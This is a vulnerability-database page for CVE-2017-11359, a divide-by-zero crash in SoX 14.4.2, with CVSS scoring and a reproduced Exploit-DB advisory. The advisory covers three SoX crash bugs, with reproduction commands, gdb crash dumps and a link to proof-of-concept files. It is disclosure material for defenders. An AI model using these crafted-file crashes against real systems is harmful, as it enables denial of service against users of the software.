CVE-2017-11359 : Detail

CVE-2017-11359

5.5
/
Medium
0.44%V3
Local
2017-07-31
11h00 +00:00
2019-03-06
09h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The wavwritehdr function in wav.c in Sound eXchange (SoX) 14.4.2 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted snd file, during conversion to a wav file.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-369 Divide By Zero
The product divides a value by zero.

Metrics

Metrics Score Severity CVSS Vector Source
V3.0 5.5 MEDIUM CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Local

A vulnerability exploitable with Local access means that the vulnerable component is not bound to the network stack, and the attacker's path is via read/write/execute capabilities. In some cases, the attacker may be logged in locally in order to exploit the vulnerability, otherwise, she may rely on User Interaction to execute a malicious file.

Attack Complexity

This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack.

User Interaction

This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.

Required

Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited. For example, a successful exploit may only be possible during the installation of an application by a system administrator.

Base: Scope Metrics

An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges.

Scope

Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.

Unchanged

An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same.

Base: Impact Metrics

The Impact metrics refer to the properties of the impacted component.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

None

There is no loss of confidentiality within the impacted component.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

None

There is no loss of integrity within the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.

Environmental Metrics

 [email protected]
V2 4.3 AV:N/AC:M/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 42398

Publication date : 2017-07-30 22h00 +00:00
Author : qflb.wu
EDB Verified : No

Sound eXchange (SoX) multiple vulnerabilities ================ Author : qflb.wu =============== Introduction: ============= SoX is a cross-platform (Windows, Linux, MacOS X, etc.) command line utility that can convert various formats of computer audio files in to other formats. It can also apply various effects to these sound files, and, as an added bonus, SoX can play and record audio files on most platforms. Affected version: ===== 14.4.2 Vulnerability Description: ========================== 1. the startread function in wav.c in Sound eXchange(SoX) 14.4.2 can cause a denial of service(divide-by-zero error and application crash) via a crafted wav file. ./sox sox_14.4.2_divide_by_zero_error_1.wav out.ogg ----debug info:---- Program received signal SIGFPE, Arithmetic exception. 0x00007ffff7b9c829 in startread (ft=0x611540) at wav.c:950 950 wav->numSamples = div_bits(qwDataLength, ft->encoding.bits_per_sample) / ft->signal.channels; (gdb) disassemble 0x00007ffff7b9c829,0x00007ffff7b9c8ff Dump of assembler code from 0x7ffff7b9c829 to 0x7ffff7b9c8ff: => 0x00007ffff7b9c829 <startread+1577>:div %rcx 0x00007ffff7b9c82c <startread+1580>:mov %rax,0x0(%rbp) 0x00007ffff7b9c830 <startread+1584>:imul %rcx,%rax 0x00007ffff7b9c834 <startread+1588>:mov %rax,0x18(%rbx) 0x00007ffff7b9c838 <startread+1592>:mov 0x28(%rbp),%r8d 0x00007ffff7b9c83c <startread+1596>:test %r8d,%r8d 0x00007ffff7b9c83f <startread+1599>:je 0x7ffff7b9c849 <startread+1609> 0x00007ffff7b9c841 <startread+1601>:movq $0x0,0x18(%rbx) 0x00007ffff7b9c849 <startread+1609>:mov %r9d,0x14(%rsp) 0x00007ffff7b9c84e <startread+1614>:mov %edi,0x10(%rsp) 0x00007ffff7b9c852 <startread+1618>:callq 0x7ffff7b50390 <sox_get_globals@plt> 0x00007ffff7b9c857 <startread+1623>:cmpw $0x1,0x22(%rsp) 0x00007ffff7b9c85d <startread+1629>:lea 0x241fa(%rip),%rdx # 0x7ffff7bc0a5e 0x00007ffff7b9c864 <startread+1636>:mov 0x10(%rsp),%edi 0x00007ffff7b9c868 <startread+1640>:mov 0x30(%rsp),%r8d 0x00007ffff7b9c86d <startread+1645>:lea 0x1de3a(%rip),%rcx # 0x7ffff7bba6ae 0x00007ffff7b9c874 <startread+1652>:mov %rdx,0x40(%rax) 0x00007ffff7b9c878 <startread+1656>:lea 0x115e7(%rip),%rax # 0x7ffff7bade66 ---Type <return> to continue, or q <return> to quit---q End of assembler dump. (gdb) i r rax 0x5371335 rbx 0x6115406362432 rcx 0x00 rdx 0x00 rsi 0x88 rdi 0x11 rbp 0x611a600x611a60 rsp 0x7fffffffdc000x7fffffffdc00 r8 0x7ffff7fce7c0140737353934784 r9 0x00 r10 0x7fffffffd9c0140737488345536 r11 0x7ffff72cca80140737340295808 r12 0x5371335 r13 0x7fffffffdc50140737488346192 r14 0x7fffffffdc40140737488346176 r15 0x00 rip 0x7ffff7b9c8290x7ffff7b9c829 <startread+1577> eflags 0x10246[ PF ZF IF RF ] cs 0x3351 ss 0x2b43 ds 0x00 es 0x00 fs 0x00 gs 0x00 (gdb) POC: sox_14.4.2_divide_by_zero_error_1.wav CVE: CVE-2017-11332 2. the read_samples function in hcom.c in Sound eXchange(SoX) 14.4.2 can cause a denial of service(invalid memory read and application crash) via a crafted hcom file. ./sox sox_14.4.2_invalid_memory_read.hcom out.wav ----debug info:---- Program received signal SIGSEGV, Segmentation fault. read_samples (ft=0x611590, buf=0x61460c, len=8185) at hcom.c:215 215 if(p->dictionary[p->dictentry].dict_leftson < 0) { (gdb) bt #0 read_samples (ft=0x611590, buf=0x61460c, len=8185) at hcom.c:215 #1 0x00007ffff7b58409 in sox_read (ft=ft@entry=0x611590, buf=<optimized out>, len=8192) at formats.c:978 #2 0x0000000000409dd4 in sox_read_wide (ft=0x611590, buf=<optimized out>, max=<optimized out>) at sox.c:490 #3 0x000000000040a32e in combiner_drain (effp=0x614410, obuf=0x6145f0, osamp=0x7fffffffdbb0) at sox.c:552 #4 0x00007ffff7b68c0d in drain_effect (n=0, chain=0x614260) at effects.c:352 #5 sox_flow_effects (chain=0x614260, callback=callback@entry=0x405a80 <update_status>, client_data=client_data@entry=0x0) at effects.c:445 #6 0x0000000000407bf6 in process () at sox.c:1802 #7 0x0000000000403085 in main (argc=3, argv=0x7fffffffdf98) at sox.c:3008 (gdb) disassemble Dump of assembler code for function read_samples: 0x00007ffff7b93900 <+0>:push %r15 0x00007ffff7b93902 <+2>:push %r14 0x00007ffff7b93904 <+4>:mov %rsi,%r14 0x00007ffff7b93907 <+7>:push %r13 0x00007ffff7b93909 <+9>:push %r12 0x00007ffff7b9390b <+11>:push %rbp 0x00007ffff7b9390c <+12>:push %rbx 0x00007ffff7b9390d <+13>:mov %rdi,%rbx 0x00007ffff7b93910 <+16>:sub $0x28,%rsp 0x00007ffff7b93914 <+20>:mov 0x2d0(%rdi),%r15 0x00007ffff7b9391b <+27>:mov 0x24(%r15),%esi 0x00007ffff7b9391f <+31>:test %esi,%esi 0x00007ffff7b93921 <+33>:js 0x7ffff7b93a60 <read_samples+352> 0x00007ffff7b93927 <+39>:mov 0x10(%r15),%rdi 0x00007ffff7b9392b <+43>:xor %eax,%eax 0x00007ffff7b9392d <+45>:lea (%rax,%rdx,1),%r13d 0x00007ffff7b93931 <+49>:lea 0x28(%r15),%rbp 0x00007ffff7b93935 <+53>:mov %rdx,%r12 0x00007ffff7b93938 <+56>:lea 0x1(%r13),%eax 0x00007ffff7b9393c <+60>:mov %eax,0xc(%rsp) 0x00007ffff7b93940 <+64>:mov %r13d,%eax 0x00007ffff7b93943 <+67>:mov %r12d,0x8(%rsp) ---Type <return> to continue, or q <return> to quit--- 0x00007ffff7b93948 <+72>:sub %r12d,%eax 0x00007ffff7b9394b <+75>:mov %eax,(%rsp) 0x00007ffff7b9394e <+78>:jmp 0x7ffff7b93989 <read_samples+137> 0x00007ffff7b93950 <+80>:lea -0x1(%rax),%r8d 0x00007ffff7b93954 <+84>:movslq 0x20(%r15),%rax 0x00007ffff7b93958 <+88>:mov 0x28(%r15),%edx 0x00007ffff7b9395c <+92>:mov (%r15),%rsi 0x00007ffff7b9395f <+95>:shl $0x4,%rax 0x00007ffff7b93963 <+99>:test %edx,%edx 0x00007ffff7b93965 <+101>:js 0x7ffff7b939e0 <read_samples+224> 0x00007ffff7b93967 <+103>:movswq 0x8(%rsi,%rax,1),%rax 0x00007ffff7b9396d <+109>:mov %eax,0x20(%r15) 0x00007ffff7b93971 <+113>:shl $0x4,%rax 0x00007ffff7b93975 <+117>:add %edx,%edx 0x00007ffff7b93977 <+119>:mov %r8d,0x24(%r15) 0x00007ffff7b9397b <+123>:add %rsi,%rax 0x00007ffff7b9397e <+126>:mov %edx,0x28(%r15) => 0x00007ffff7b93982 <+130>:cmpw $0x0,0x8(%rax) 0x00007ffff7b93987 <+135>:js 0x7ffff7b939f0 <read_samples+240> 0x00007ffff7b93989 <+137>:test %rdi,%rdi 0x00007ffff7b9398c <+140>:jle 0x7ffff7b93a48 <read_samples+328> 0x00007ffff7b93992 <+146>:mov 0x24(%r15),%eax 0x00007ffff7b93996 <+150>:test %eax,%eax ---Type <return> to continue, or q <return> to quit---q Quit (gdb) i r rax 0x631b306495024 rbx 0x6115906362512 rcx 0x11 rdx 0x6900006881280 rsi 0x611b206363936 rdi 0x5241316 rbp 0x611ad80x611ad8 rsp 0x7fffffffda300x7fffffffda30 r8 0x1016 r9 0x7ffff7fce7c0140737353934784 r10 0x7fffffffd7f0140737488345072 r11 0x7ffff72cb2e0140737340289760 r12 0x1ff98185 r13 0x20008192 r14 0x61460c6374924 r15 0x611ab06363824 rip 0x7ffff7b939820x7ffff7b93982 <read_samples+130> eflags 0x10206[ PF IF RF ] cs 0x3351 ss 0x2b43 ds 0x00 es 0x00 fs 0x00 ---Type <return> to continue, or q <return> to quit---q Quit (gdb) x/20x $rax+8 0x631b38:Cannot access memory at address 0x631b38 (gdb) POC: sox_14.4.2_invalid_memory_read.hcom CVE: CVE-2017-11358 3. the wavwritehdr function in wav.c in Sound eXchange(SoX) 14.4.2 allows remote attackers to cause a denial of service(divide-by-zero error and application crash) via a crafted snd file which convert to wav file. ./sox sox_14.4.2_divide_by_zero_error_2.snd out.wav ----debug info:---- Program received signal SIGFPE, Arithmetic exception. 0x00007ffff7b9a97b in wavwritehdr (ft=ft@entry=0x611bf0, second_header=second_header@entry=0) at wav.c:1457 1457 blocksWritten = MS_UNSPEC/wBlockAlign; (gdb) bt #0 0x00007ffff7b9a97b in wavwritehdr (ft=ft@entry=0x611bf0, second_header=second_header@entry=0) at wav.c:1457 #1 0x00007ffff7b9c0e9 in startwrite (ft=0x611bf0) at wav.c:1252 #2 0x00007ffff7b59e32 in open_write ( path=path@entry=0x611bc0 "/home/a/Documents/out.wav", buffer=buffer@entry=0x0, buffer_size=buffer_size@entry=0, buffer_ptr=buffer_ptr@entry=0x0, buffer_size_ptr=buffer_size_ptr@entry=0x0, signal=signal@entry=0x611410, encoding=encoding@entry=0x611430, filetype=0x611bd6 "wav", oob=oob@entry=0x7fffffffdcd0, overwrite_permitted=overwrite_permitted@entry=0x409ce0 <overwrite_permitted>) at formats.c:912 #3 0x00007ffff7b5a5e8 in sox_open_write ( path=path@entry=0x611bc0 "/home/a/Documents/out.wav", signal=signal@entry=0x611410, encoding=encoding@entry=0x611430, filetype=<optimized out>, oob=oob@entry=0x7fffffffdcd0, overwrite_permitted=overwrite_permitted@entry=0x409ce0 <overwrite_permitted>) at formats.c:948 #4 0x000000000040847a in open_output_file () at sox.c:1557 #5 process () at sox.c:1754 #6 0x0000000000403085 in main (argc=3, argv=0x7fffffffdfa8) at sox.c:3008 (gdb) disassemble 0x00007ffff7b9a97b,0x00007ffff7b9a9ff Dump of assembler code from 0x7ffff7b9a97b to 0x7ffff7b9a9ff: => 0x00007ffff7b9a97b <wavwritehdr+427>:idivl 0x10(%rsp) 0x00007ffff7b9a97f <wavwritehdr+431>:movslq %eax,%rcx 0x00007ffff7b9a982 <wavwritehdr+434>:imul %eax,%r12d 0x00007ffff7b9a986 <wavwritehdr+438>:mov %rcx,0x48(%rsp) 0x00007ffff7b9a98b <wavwritehdr+443>:imul %r14d,%eax 0x00007ffff7b9a98f <wavwritehdr+447>:cmp $0x31,%bp 0x00007ffff7b9a993 <wavwritehdr+451>:mov %eax,0x40(%rsp) 0x00007ffff7b9a997 <wavwritehdr+455>:je 0x7ffff7b9aff0 <wavwritehdr+2080> 0x00007ffff7b9a99d <wavwritehdr+461>:cmp $0x1,%bp 0x00007ffff7b9a9a1 <wavwritehdr+465>:je 0x7ffff7b9b0a8 <wavwritehdr+2264> 0x00007ffff7b9a9a7 <wavwritehdr+471>:movzwl 0x3e(%rsp),%eax 0x00007ffff7b9a9ac <wavwritehdr+476>:movl $0x0,0x34(%rsp) 0x00007ffff7b9a9b4 <wavwritehdr+484>:lea 0x12(%rax),%r13d 0x00007ffff7b9a9b8 <wavwritehdr+488>:mov %r12d,%eax 0x00007ffff7b9a9bb <wavwritehdr+491>:and $0x1,%eax 0x00007ffff7b9a9be <wavwritehdr+494>:movzwl %r13w,%r13d 0x00007ffff7b9a9c2 <wavwritehdr+498>:lea (%r12,%r13,1),%edx 0x00007ffff7b9a9c6 <wavwritehdr+502>:add %edx,%eax 0x00007ffff7b9a9c8 <wavwritehdr+504>:cmp $0x1,%bp 0x00007ffff7b9a9cc <wavwritehdr+508>:setne 0x3d(%rsp) ---Type <return> to continue, or q <return> to quit---q Quit (gdb) x/10gx $rsp+10 0x7fffffffdaaa:0x00000000000000000x0056000000000000 0x7fffffffdaba:0x00010000000000d40x0001000000000000 0x7fffffffdaca:0x00000000000800000x0000000000000008 0x7fffffffdada:0x0fe000007fff00000x876000007ffff7bc 0x7fffffffdaea:0x00d000007ffff7610x21a0000000000000 (gdb) POC: sox_14.4.2_divide_by_zero_error_2.snd CVE: CVE-2017-11359 Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42398.zip

Products Mentioned

Configuraton 0

Sound_exchange_project>>Sound_exchange >> Version 14.4.2

Configuraton 0

Debian>>Debian_linux >> Version 7.0

Debian>>Debian_linux >> Version 8.0

References

https://www.exploit-db.com/exploits/42398/
Tags : exploit, x_refsource_EXPLOIT-DB
https://security.gentoo.org/glsa/201810-02
Tags : vendor-advisory, x_refsource_GENTOO